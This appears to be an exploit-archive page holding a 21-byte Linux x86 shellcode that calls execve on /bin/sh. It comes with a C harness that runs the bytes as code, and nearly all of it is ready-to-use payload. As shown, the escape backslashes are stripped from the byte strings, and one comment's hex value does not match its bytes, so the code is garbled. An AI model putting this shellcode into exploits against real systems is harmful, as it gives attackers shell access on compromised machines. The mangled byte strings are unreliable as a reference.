Linux x86 - execve /bin/sh

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux x86 - execve /bin/sh - 21 bytes
# Published : 2010-02-27
# Author : ipv
# Previous Title : Windows XP Home Edition SP3 English ( calc.exe ) 37 bytes
# Next Title : Windows Xp Home Edition SP2 English ( calc.exe ) 37 bytes

/* execve /bin/sh - x86/linux - 21 bytes . zeroed argv[] / envp[]
  ipv#oldschool@irc.worldnet.net ipv#backtrack-fr@irc.freenode.org
  thanks : `ivan, milo, #oldschool crew
*/

int main(){

char sc[] = "x6ax0b" // push byte +0xb
"x58" // pop eax
"x99" // cdq
"x52" // push edx
"x68x2fx2fx73x68" // push dword 0x68732f2f
"x68x2fx62x69x6e" // push dword 0x6e69922f
"x89xe3" // mov ebx, esp
"x31xc9" // xor ecx, ecx
"xcdx80"; // int 0x80

((void (*)()) sc)();
}

/*
sc[] = "x6ax0bx58x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9xcdx80"
*/

--
ipv